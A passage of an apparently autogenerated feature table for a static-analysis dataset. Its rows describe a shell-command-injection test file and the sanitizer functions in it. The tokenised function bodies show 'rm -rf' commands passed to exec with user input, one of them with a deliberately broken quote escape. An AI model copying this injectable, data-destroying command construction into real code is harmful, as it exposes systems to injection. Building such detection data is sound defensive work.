enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | this | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | this | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | 'arguments' object of anonymous function | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | exceptional return of anonymous function | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | exceptional return of anonymous function | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | functio ... OT OK\\n} | assignedToPropName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | return of anonymous function | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | return of anonymous function | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:183:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:38:177:41 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:14 | sanitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:14 | sanitized | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:14 | sanitized | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:14 | sanitized | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:14 | sanitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitiz ... ) + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitiz ... ) + "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitiz ... ) + "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitiz ... ) + "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitiz ... ) + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitized | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitized | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitized | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:6:178:56 | sanitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:20 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:20 | "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:20 | "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:20 | "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:20 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:20 | "'" | stringConcatenatedWith | -endpoint- name.replace() + ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:50 | "'" + n ... '\\\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:50 | "'" + n ... '\\\\''") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:50 | "'" + n ... '\\\\''") | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:50 | "'" + n ... '\\\\''") | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:50 | "'" + n ... '\\\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:56 | "'" + n ... ) + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:56 | "'" + n ... ) + "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:56 | "'" + n ... ) + "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:56 | "'" + n ... ) + "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:18:178:56 | "'" + n ... ) + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:27 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:27 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:27 | name | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:27 | name | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:27 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:35 | name.replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 